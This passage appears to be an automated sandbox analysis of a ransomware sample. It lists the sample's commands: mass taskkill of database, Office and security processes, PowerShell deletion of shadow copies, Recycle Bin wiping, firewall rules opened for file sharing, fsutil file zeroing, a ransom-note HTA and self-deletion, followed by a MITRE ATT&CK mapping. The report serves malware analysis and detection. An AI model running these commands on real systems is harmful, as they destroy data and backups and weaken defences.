  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1172
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1756
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3940
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:3208
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:296
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:380
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3544
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4004
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3192
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:1468
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2704
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3100
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1040
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1244
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:400
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES !.hta
  2⤵
  PID:3572
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1884
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1456
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:4080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
  2⤵
  PID:1780
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2412-186-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-182-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-181-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-184-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-202-0x000002653FE16000-0x000002653FE18000-memory.dmp

Filesize
8KB

Download
memory/2412-201-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-185-0x000002653FD70000-0x000002653FD71000-memory.dmp

Filesize
4KB

Download
memory/2412-183-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-187-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-188-0x000002653FFA0000-0x000002653FFA1000-memory.dmp

Filesize
4KB

Download
memory/2412-189-0x0000026525D60000-0x0000026525D62000-memory.dmp

Filesize
8KB

Download
memory/2412-191-0x000002653FE10000-0x000002653FE12000-memory.dmp

Filesize
8KB

Download
memory/2412-193-0x000002653FE13000-0x000002653FE15000-memory.dmp

Filesize
8KB

Download
memory/3140-117-0x000000001B260000-0x000000001B262000-memory.dmp

Filesize
8KB

Download
memory/3140-115-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/3572-204-0x0000020A5C348000-0x0000020A5C350000-memory.dmp

Filesize
32KB

Download